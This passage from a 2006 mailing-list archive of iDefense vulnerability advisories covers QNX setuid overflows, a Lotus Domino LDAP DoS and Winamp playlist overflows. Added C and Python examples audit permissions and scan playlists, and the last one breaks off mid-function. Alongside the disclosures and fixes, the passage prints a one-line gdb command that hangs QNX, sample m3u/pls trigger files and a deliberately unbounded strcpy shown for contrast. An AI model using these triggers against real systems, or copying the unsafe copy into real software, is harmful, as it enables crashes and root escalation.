this vulnerability is not significantly impacted by this limitation.

IV. DETECTION

This vulnerability has been tested with Windows Media Player 9 and 10,
when launched from the following browsers:

   * Firefox  .9 - Current
   * Netscape 8

Other versions of Windows Media Player may be vulnerable. This exploit
may be able to be triggered from browsers other than those listed
above.

This condition does not appear to be able to be launched from Internet
Explorer or Opera browsers.

V. WORKAROUND

This exploit can only be triggered if Windows Media Player is set as
the default application to launch media file extensions. Exploitation
can be prevented by remapping any media file extensions typically
handled by Windows Media Player to an alternative application.

This exploit can also only be launched from specific browsers. Users
could use an alternative browser until an official vendor supplied patch
is available.

VI. VENDOR RESPONSE

The vendor has issued the following security advisory for this issue:

 http://www.microsoft.com/technet/security/bulletin/MS06-006.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-0005 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/31/2005  Initial vendor notification
08/31/2005  Initial vendor response
02/14/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was submitted to iDefense by John Cobb, as well as a
second researcher who wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



iDEFENSE Security Advisory 02.10.06: IBM Lotus Domino Server LDAP DoS Vulnerability

2006-02-10 Thread [EMAIL PROTECTED]

IBM Lotus Domino Server LDAP DoS Vulnerability

iDEFENSE Security Advisory 02.10.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=389
February 10, 2006

I. BACKGROUND

IBM Lotus Domino Server software provides messaging, calendaring and
scheduling capabilities on a variety of operating systems. More
information about the product is available from:

   http://www.lotus.com/products/product4.nsf/wdocs/dominohomepage

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in IBM Corp.'s
Lotus Domino LDAP server allows attackers to crash the service, thereby
preventing legitimate access. iDEFENSE is currently unaware of exploits
for this vulnerability other than those maintained by iDEFENSE Labs.
Vendor patches for this iDEFENSE exclusive report are currently
unavailable. A workaround has been provided.

The problem specifically exists within the LDAP server "nldap.exe." When
sending a specially crafted bind request with a long string to the LDAP
server port (389), a NULL pointer dereference occurs, resulting in a
crash of the process.

III. ANALYSIS

Exploitation of this vulnerability allows unauthenticated remote
attackers to crash the LDAP service, thereby preventing legitimate
usage. This attack takes little resources to launch and can be repeated
to ensure that an unpatched computer is unable to recover even after the
administrator manually restarts the service.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in Lotus
Domino Server version 6.5.4. It is suspected that earlier versions of
Lotus Domino Server are also affected.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to systems and services. More specifically,
limit access to TCP port 389 on the LDAP server to only allow trusted
hosts to connect.

VI. VENDOR RESPONSE

The vendor has addressed this issue in the following products:

- IBM Lotus Notes/Domino 6.5.4 FP2
- IBM Lotus Notes/Domino 6.5.5
- IBM Lotus Notes/Domino 7.0.1

The vendor has published the following technote which details patching
procedures:

 http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21229907

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2712 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/23/2005  Initial vendor notification
08/23/2005  Initial vendor response
02/10/2006  Coordinated public disclosure

IX. CREDIT

Sebastian Apelt is credited with the discovery of this vulnerability.




iDefense Security Advisory 02.07.06: QNX RTOS 6.3.0 rc.local Insecure File Permissions Vulnerability

2006-02-08 Thread [EMAIL PROTECTED]

QNX RTOS 6.3.0 rc.local Insecure File Permissions Vulnerability

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=387
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating
system designed for use in embedded systems. More information is
available at:

 http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of a design vulnerability in QNX Software Systems QNX
Realtime Operating System (RTOS) allows attackers to execute arbitrary
commands with root privileges.

The problem specifically exists because QNX RTOS 6.3.0 ships with world
writable permissions on the file /etc/rc.d/rc.local. This file is parsed
and executed with root privileges upon startup. An attacker can insert
commands into this file which will then be executed once the operating
system is restarted.

III. ANALYSIS

Successful exploitation allows local attackers to execute arbitrary
commands with root privileges. This vulnerability when combined with a
local system-wide denial of service vulnerability allows an attacker to
gain immediate root privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in QNX RTOS
version 6.3.0. Version 6.0 was also tested and found to not be
vulnerable.

V. WORKAROUND

Set more restrictive permissions on the rc.local file:

 chmod 644 /etc/rc.d/rc.local

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/24/2004   Initial vendor notification
02/07/2006   Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.




iDefense Security Advisory 02.07.06: QNX Neutrino RTOS passwd Command Buffer Overflow

2006-02-08 Thread [EMAIL PROTECTED]

QNX Neutrino RTOS passwd Command Buffer Overflow

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=388
February 7, 2006

I. BACKGROUND

QNX Neutrino RTOS is a real-time operating system designed for use in
embedded systems. More information is available at
http://www.qnx.com/products/ps_neutrino.

II. DESCRIPTION

Local exploitation of a buffer overflow in QNX Neutrino RTOS's (QNX)
'passwd' command allows attackers to gain root privileges. The problem
specifically exists in the parsing of a long string passed as the first
argument to the set user id (setuid) binary 'passwd'. The 'passwd'
command is intended for changing a user's password. A string larger than
approximately 4000 bytes causes a stack overflow directly overwriting
the stored return address and allowing an attacker to seize CPU control
and eventually execute arbitrary code under root privileges.

III. ANALYSIS

Any authenticated local attacker can exploit this vulnerability to gain
super-user (root) privileges on the affected system.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in QNX
Neutrino RTOS version 6.2.0. Earlier versions are suspected to be
susceptible to exploitation as well.

V. WORKAROUND

Clear the set user id or execute bits from the affected binary or remove
it entirely.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

06/04/2004  Initial vendor notification
02/07/2006  Public disclosure

IX. CREDIT

Texonet (www.texonet.com) is credited with this discovery.




iDefense Security Advisory 02.07.06: QNX Neutrino RTOS phgrafx Command Buffer Overflow

2006-02-08 Thread [EMAIL PROTECTED]

QNX Neutrino RTOS phgrafx Command Buffer Overflow

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=384
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating
system designed for use in embedded systems. More information is
available at:

 http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of a buffer overflow in QNX Neutrino RTOS's (QNX)
'phgrafx' command allows attackers to gain root privileges.

The problem specifically exists in the parsing of a long string passed
as the first argument to the set user id (setuid) binary 'phgrafx'. A
string larger than approximately 1,000 bytes causes a stack overflow
directly overwriting the stored return address and allowing an attacker
to seize CPU control and eventually execute arbitrary code under root
privileges.

III. ANALYSIS

Successful exploitation provides local attackers with super-user
privileges on the affected system allowing for complete control.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in QNX
Neutrino RTOS version 6.2.1. Earlier versions are suspected to be
susceptible to exploitation as well.

V. WORKAROUND

Clear the set user id or execute bits from the affected binary or remove
it entirely.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

08/24/2004  Initial vendor notification
02/07/2006  Public disclosure

IX. CREDIT

Knud Hojgaard (http://kokanin.dtors.net) is credited with this
discovery.



iDefense Security Advisory 02.07.06: QNX Neutrino RTOS libph PHOTON_PATH Buffer Overflow Vulnerability

2006-02-08 Thread [EMAIL PROTECTED]

QNX Neutrino RTOS libph PHOTON_PATH Buffer Overflow Vulnerability

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=382
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating
system designed for use in embedded systems. More information is
available at:

 http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of a stack-based buffer overflow vulnerability in QNX
Inc.'s Neutrino RTOS Operating System allows local attackers to gain
root privileges.

The vulnerability specifically exists due to improper handling of
environment variables in the libph system library. The libph system
library is utilized by various setuid applications that utilize the
Photon API. The setitem() function fails to check bounds on the
PHOTON_PATH environment variable prior to a strcpy operation. An
attacker can supply an overly long value for PHOTON_PATH to overflow the
stack buffer and overwrite the return address as shown here:

Breakpoint 1, 0xb0343624 in strcpy ()
 from /usr/qnx630/target/qnx6/x86/lib/libc.so.2
(gdb) bt
#0 0xb0343624 in strcpy () from /usr/qnx630/target/qnx6/x86/lib/libc.so.2
#1 0xb826f58b in setitem ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#2 0xb826f7ec in additems ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#3 0xb826ffa9 in list_modify ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#4 0xb82ef2fe in PtSetValue ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#5 0xb82c7ceb in PtCompoundSetResources ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#6 0xb82ed018 in PtSetResources ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#7 0xb8244bf3 in set_list_res ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#8 0xb82ef2fe in PtSetValue ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#9 0xb82c7ceb in PtCompoundSetResources ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#10 0xb82ed018 in PtSetResources ()
 from /usr/qnx630/target/qnx6/x86/usr/lib/libph.so.3
#11 0x0804db32 in main ()
#12 0x in ?? ()

Attackers can supply a specially crafted value to overflow the buffer
and execute arbitrary code.

III. ANALYSIS

Successful exploitation of the vulnerability allows local attackers to
gain root privileges. The libph library is a core system library on
Neutrino RTOS, however it has had a number of trivial vulnerabilities
similar to this one.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability on QNX
Neutrino RTOS 6.3.0. All versions are suspected vulnerable.

V. WORKAROUND

As a workaround solution, remove the setuid bit from any programs linked
to libph.so.3. An example is shown here:

# ls -l /usr/photon/bin/phlocale
-rwsrwxr-x 1 root root 54244 May 05 2004 /usr/photon/bin/phlocale
# ldd /usr/photon/bin/phlocale
/usr/photon/bin/phlocale:
   libAp.so.3 => /usr/lib/libAp.so.3 (0xb820)
   libph.so.3 => /usr/lib/libph.so.3 (0xb821)
   libphrender.so.2 => /usr/lib/libphrender.so.2 (0xb8312000)
   libm.so.2 => /lib/libm.so.2 (0xb8347000)
   libfont.so.1 => /lib/libfont.so.1 (0xb8363000)
   libc.so.2 => /usr/lib/ldqnx.so.2 (0xb030)
# chmod -s /usr/photon/bin/phlocale

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/15/2005 Initial vendor notification
02/07/2006 Public disclosure

IX. CREDIT

iDefense credits Filipe Balestra ([EMAIL PROTECTED]) with the
discovery of this vulnerability.


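The setitem()/strcpy() defect above is the classic unbounded copy of an
environment variable into a fixed stack buffer. The following is an added
example written for this archive, not libph or iDefense code: it shows the
vulnerable pattern beside a bounded replacement. The struct layout, the
PHOTON_PATH_MAX size and the setitem_* and bounded_accepts_len names are
assumptions for illustration; the real libph internals are not on the page.

```c
/* Added example, not libph or iDefense code: the unbounded strcpy() of an
 * environment variable the advisory describes, beside a bounded replacement.
 * The struct, the PHOTON_PATH_MAX size and the setitem_* names are assumed for
 * illustration; the real libph internals are not shown on the page. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PHOTON_PATH_MAX 256          /* assumed fixed stack buffer size */

struct photon_item {
    char path[PHOTON_PATH_MAX];
};

/* Vulnerable pattern: the copy length is whatever the caller of the setuid
 * program put in the environment, so a value of PHOTON_PATH_MAX bytes or more
 * runs past item->path into the adjacent stack frame. Shown for contrast;
 * it is never called with an over-long value here. */
int setitem_unbounded(struct photon_item *item, const char *value)
{
    if (value == NULL)
        return -1;
    strcpy(item->path, value);       /* no length check */
    return 0;
}

/* Hardened form: bound the length scan itself, refuse anything that cannot
 * fit together with its terminating NUL, and only then copy. */
int setitem_bounded(struct photon_item *item, const char *value)
{
    if (value == NULL)
        return -1;
    size_t len = strnlen(value, PHOTON_PATH_MAX);
    if (len >= PHOTON_PATH_MAX)      /* 255 bytes is the most that fits */
        return -1;
    memcpy(item->path, value, len + 1);
    return 0;
}

/* Read PHOTON_PATH through the bounded copier: 0 on success, -1 if the
 * variable is unset or oversize. A setuid program should treat -1 as fatal
 * rather than fall back to a default silently. */
int load_photon_path(struct photon_item *item)
{
    return setitem_bounded(item, getenv("PHOTON_PATH"));
}

/* Self-check: does the bounded copier accept a value of n bytes?
 * Returns 1 if accepted, 0 if rejected, -1 on allocation failure. */
int bounded_accepts_len(size_t n)
{
    struct photon_item item;
    char *value = malloc(n + 1);
    if (value == NULL)
        return -1;
    memset(value, 'A', n);           /* constructed input, all 'A' */
    value[n] = '\0';
    int rc = setitem_bounded(&item, value);
    free(value);
    return rc == 0;
}

int main(void)
{
    struct photon_item item;
    setenv("PHOTON_PATH", "/usr/photon", 1);
    printf("short value: %s\n",
           load_photon_path(&item) == 0 ? "accepted" : "rejected");
    printf("%zu-byte value: %s\n", (size_t)PHOTON_PATH_MAX + 64,
           bounded_accepts_len(PHOTON_PATH_MAX + 64) ? "accepted" : "rejected");
    return 0;
}
```

The point of strnlen() over strlen() is that the scan itself is bounded, so
a value without a terminator within reach cannot drive the check past the
end of the source either; the limit is checked before any byte is written.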


iDefense Security Advisory 02.07.06: QNX RTOS 6.3.0 Local Denial of Service Vulnerability

2006-02-08 Thread [EMAIL PROTECTED]

QNX RTOS 6.3.0 Local Denial of Service Vulnerability

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=386
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating
system designed for use in embedded systems. More information is
available at:

 http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of a denial of service vulnerability in QNX Software
Systems QNX Realtime Operating System (RTOS) allows attackers to crash
the operating system.

The problem specifically exists when a local user executes the following
command:

 echo -e "break *0xb032d59f\nr\ncont\ncont" | gdb gdb

Executing the above command causes the operating system to become
unresponsive and hang.

III. ANALYSIS

Successful exploitation allows local attackers to crash the affected
operating system.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in QNX RTOS
version 6.3.0. Version 6.0 was also tested and found to not be
vulnerable.

V. WORKAROUND

Remove the GNU Debugger (GDB) from affected systems.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/23/2004  Initial vendor notification
02/07/2006  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.



iDefense Security Advisory 02.07.06: QNX Neutrino RTOS su Command Buffer Overflow

2006-02-08 Thread [EMAIL PROTECTED]

QNX Neutrino RTOS su Command Buffer Overflow

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=385
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating
system designed for use in embedded systems. More information is
available at:

 http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of a buffer overflow in QNX Neutrino RTOS's (QNX)
'su' command allows attackers to gain root privileges. The problem
specifically exists in the parsing of a long string passed as the first
argument to the set user id (setuid) binary 'su'. The 'su' command is
intended for running commands under a substitute user or group id. A
string larger than approximately 4000 bytes causes a stack overflow
directly overwriting the stored return address and allowing an attacker
to seize CPU control and eventually execute arbitrary code under root
privileges.

III. ANALYSIS

Any authenticated local attacker can exploit this vulnerability to gain
super-user (root) privileges on the affected system.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in QNX
Neutrino RTOS version 6.2.0. Earlier versions are suspected to be
susceptible to exploitation as well.

V. WORKAROUND

Clear the set user id or execute bits from the affected binary or remove
it entirely.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

06/04/2004  Initial vendor notification
02/07/2006  Public disclosure

IX. CREDIT

Texonet (www.texonet.com) is credited with this discovery.




iDefense Security Advisory 02.07.06: QNX Neutrino RTOS phfont Race Condition Vulnerability

2006-02-08 Thread [EMAIL PROTECTED]

QNX Neutrino RTOS phfont Race Condition Vulnerability

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating
system designed for use in embedded systems. More information is
available at:

 http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of a race condition vulnerability in QNX Neutrino
RTOS's (QNX) phfont command allows attackers to gain root privileges.

QNX Neutrino RTOS is a real-time operating system designed for use in
embedded systems. The problem specifically exists because phfont spawns
another command, phfontphf, without proper sanity checking. A local
attacker can create a malicious replacement for this command and cause
it to be executed in place of the original by manipulating the PHFONT
and PHOTON2_PATH environment variables. phfont is installed set user id
root by default.

III. ANALYSIS

Successful exploitation provides local attackers with super user
privileges on the affected system, allowing for complete control.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in QNX
Neutrino RTOS version 6.2.1. Earlier versions are also suspected to be
susceptible to exploitation.

V. WORKAROUND

Clear the set user ID or execute bits from the affected binary or remove
it entirely.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

09/29/2004  Initial vendor notification
02/07/2006  Public disclosure

IX. CREDIT

Knud Hojgaard (http://kokanin.dtors.net) is credited with this discovery.


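The QNX advisories above share two workarounds: chmod 644 on the
world-writable /etc/rc.d/rc.local, and clearing the set-user-id bit on the
affected binaries (su, passwd, phgrafx, phfont, anything linked to libph).
The following is an added example written for this archive, not QNX or
iDefense code: a small POSIX audit tool that flags files with either
condition and, with --fix, applies those two mode changes. The flag names,
the remediated_mode() policy and the selftest helper are this example's own
assumptions.

```c
/* Added example, not QNX or iDefense code: audit and remediate the two
 * conditions the QNX advisories describe (world-writable startup script,
 * set-user-id binaries). POSIX only; all names are this example's own. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

enum {
    AUDIT_WORLD_WRITABLE = 1,   /* o+w: anyone can edit it (the rc.local case) */
    AUDIT_SETUID         = 2,   /* u+s: runs as its owner (the su/passwd/phgrafx case) */
    AUDIT_SETGID         = 4
};

/* Classify a mode word; pure, so it can be checked without touching disk. */
int audit_mode(mode_t m)
{
    int flags = 0;
    if (m & S_IWOTH) flags |= AUDIT_WORLD_WRITABLE;
    if (m & S_ISUID) flags |= AUDIT_SETUID;
    if (m & S_ISGID) flags |= AUDIT_SETGID;
    return flags;
}

/* Mode after applying the workarounds: drop group/other write on a
 * world-writable file (0666 -> 0644, the advisory's chmod 644) and clear
 * both set-id bits (chmod -s). Other bits are left alone. */
mode_t remediated_mode(mode_t m)
{
    m &= 07777;
    if (m & S_IWOTH)
        m &= ~(mode_t)(S_IWGRP | S_IWOTH);
    m &= ~(mode_t)(S_ISUID | S_ISGID);
    return m;
}

/* Flags for a path, or -1 if it cannot be examined. Symlinks are skipped
 * because their own mode bits carry no meaning. */
int audit_path(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0) return -1;
    if (S_ISLNK(st.st_mode)) return 0;
    return audit_mode(st.st_mode);
}

/* Apply remediated_mode() to a path. Returns 0 on success, -1 on error. */
int remediate_path(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0 || S_ISLNK(st.st_mode)) return -1;
    return chmod(path, remediated_mode(st.st_mode));
}

/* Self-check on a constructed temporary file given the requested mode:
 * returns the audit flags seen after remediation (remediate != 0) or without
 * it, or -1 if the file could not be set up. */
int selftest_audit(mode_t mode, int remediate)
{
    char name[] = "/tmp/qnx-audit-XXXXXX";
    int fd = mkstemp(name);
    if (fd < 0) return -1;
    int result = -1;
    if (fchmod(fd, mode) == 0 && (!remediate || remediate_path(name) == 0))
        result = audit_path(name);
    close(fd);
    unlink(name);
    return result;
}

int main(int argc, char **argv)
{
    int fix = 0, i = 1;
    if (argc > 1 && strcmp(argv[1], "--fix") == 0) { fix = 1; i = 2; }
    for (; i < argc; i++) {
        int f = audit_path(argv[i]);
        if (f < 0) { perror(argv[i]); continue; }
        printf("%s:%s%s%s\n", argv[i],
               f & AUDIT_WORLD_WRITABLE ? " world-writable" : "",
               f & AUDIT_SETUID ? " setuid" : "",
               f & AUDIT_SETGID ? " setgid" : "");
        if (fix && f && remediate_path(argv[i]) != 0)
            perror(argv[i]);
    }
    return 0;
}
```

Usage: `./audit /etc/rc.d/rc.local /bin/su /usr/bin/passwd` reports the
findings; `./audit --fix ...` applies the mode changes. Clearing set-id bits
disables the affected programs for ordinary users, which is exactly the
trade-off the advisories' workaround makes, so review the list before using
--fix.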

Re: Workaround for unpatched Oracle PLSQL Gateway flaw

2006-02-04 Thread [EMAIL PROTECTED]
 
http://www.infoworld.com/article/06/01/27/74869_HNoraclefiresback_1.html

[EMAIL PROTECTED] wrote:
> just a note that this rewrite rule causes things in htmldb not to
> work anymore...
>
>
>




iDefense Security Advisory 02.01.06: Winamp m3u Parsing Stack Overflow Vulnerability

2006-02-01 Thread [EMAIL PROTECTED]

Winamp m3u Parsing Stack Overflow Vulnerability

iDefense Security Advisory 02.01.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=377
February 1, 2006

I. BACKGROUND

Winamp is a popular media player for Windows which supports many
audio/video file formats.

More information can be obtained from the vendors site at:

http://winamp.com/player/

II. DESCRIPTION

It has been found that a specially crafted m3u or pls file can overwrite
a stack based buffer allowing for remote code execution.

Example m3u file format:

#EXTM3U
#EXTINF:,VULN
[...]AA

Example pls file to trigger exploit:

[playlist]
numberofentries=1
File1=\\01 01AAA[...]AAA

This vulnerability is specific to the 5.11 version of Winamp and does
not affect previous versions.

III. ANALYSIS

When Winamp is installed it registers the m3u extension so that such
files will automatically open in Winamp. This exploit can be triggered
by clicking on a link in a webpage, or from the use of malicious
javascript.

Exploitation is straightforward, using a long full path. This path
can be either a filename or the UNC name for a fileshare, which does
not have to exist.

Public exploit code has been independently released for this
vulnerability (http://www.spyinstructors.com).

IV. DETECTION

This exploit was tested with version 5.11 of Winamp. Previous versions
were tested and found to not be exploitable.

V. WORKAROUND

Removing the file associations for the m3u and pls file extension may
mitigate the risk of exploitation.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this
vulnerability.

The vulnerability appears to have been silently fixed in Winamp 5.13
which is available for download at:

 http://www.winamp.com/player/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-0476 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/15/2005 Initial vendor notification
02/01/2006 Public disclosure

IX. CREDIT

This vulnerability was independently discovered by Alan Mccaig (b0f)
[EMAIL PROTECTED] and Ruben Santamarta ([EMAIL PROTECTED]).

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




iDefense Security Advisory 02.01.06: Winamp m3u/pls .WMA Extension Buffer Overflow Vulnerability

2006-02-01 Thread [EMAIL PROTECTED]

Winamp m3u/pls .WMA Extension Buffer Overflow Vulnerability

iDefense Security Advisory 02.01.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=378
February 1, 2006

I. BACKGROUND

Winamp is a popular media player for Windows which supports many
audio/video file formats.

More information can be obtained from the vendors site at:

http://winamp.com/player/

II. DESCRIPTION

It has been found that a specially crafted m3u or pls file with a
target filename having the .wma extension can crash Winamp giving the
attacker control over the EAX register.

Example m3u file format:

#EXTM3U
#EXTINF:,VULN
[...]AA.wma

Example pls file format:

[playlist]
numberofentries=5
File1=[...]AA.wma
Title1=
Length5=-1
Version=2

III. ANALYSIS

When Winamp is installed it registers the m3u and pls extensions so that
such files will automatically open in Winamp. This exploit can be
triggered by clicking on a link in a web page, or through the use of
malicious JavaScript.

The crash occurs in the Winamp module with the following instructions:

mov edx, [eax]
call [edx+24]

The number of characters that can be injected is limited. With control
of the EAX register injected into the above code, meaningful
shellcode execution is possible.

IV. DETECTION

This vulnerability has been verified in version 5.094 of Winamp.

V. WORKAROUND

Removing the file mapping for m3u and pls files to Winamp should
mitigate the risk of exploitation.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this
vulnerability.

The vulnerability appears to have been silently fixed in Winamp 5.11.
Version 5.13 is now available for download at:

 http://www.winamp.com/player/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3188 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005 Initial vendor notification
02/01/2006 Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by b0f.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
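
Both Winamp advisories above come down to one playlist entry whose path is far longer than a real filename (advisory 377: any long path, including a UNC share name; advisory 378: a long path ending in .wma). The following scanner is an added example for this page, not iDefense's or Winamp's code: it parses m3u and pls playlists and reports entries whose path length is suspicious, recording whether the entry is a UNC path or ends in .wma so both advisory patterns can be told apart. The 1024-byte threshold is an assumption chosen for illustration; neither advisory states the exact length at which the Winamp buffers overflow.

```python
"""Scan m3u and pls playlists for the oversized-path entries described in the
two Winamp advisories (long path, optionally UNC or ending in .wma).

Added example, not iDefense's or Winamp's code. PATH_LIMIT is an assumed
threshold; the advisories give no exact overflow length.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

PATH_LIMIT = 1024          # assumed threshold; tune for your environment


@dataclass
class Finding:
    fmt: str               # "m3u" or "pls"
    index: int             # 1-based entry number within the playlist
    length: int            # length of the offending path in characters
    flags: List[str]       # subset of "long", "unc", "wma"


def m3u_entries(text: str) -> List[str]:
    """Return the path lines of an (Extended) M3U file; '#' lines are directives."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def pls_entries(text: str) -> List[str]:
    """Return the FileN= values of a PLS playlist, ordered by N."""
    entries: Dict[int, str] = {}
    in_playlist = False
    for ln in text.splitlines():
        s = ln.strip()
        if not s:
            continue
        if s.startswith("[") and s.endswith("]"):
            in_playlist = s.lower() == "[playlist]"
            continue
        if not in_playlist or "=" not in s:
            continue
        key, _, value = s.partition("=")
        key = key.strip()
        if key.lower().startswith("file") and key[4:].isdigit():
            entries[int(key[4:])] = value.strip()
    return [entries[n] for n in sorted(entries)]


def inspect_entry(fmt: str, index: int, path: str) -> Optional[Finding]:
    """Flag an entry whose path is long enough to matter, and record the
    shape of the path (UNC, .wma) so an analyst can match it to an advisory."""
    flags = []
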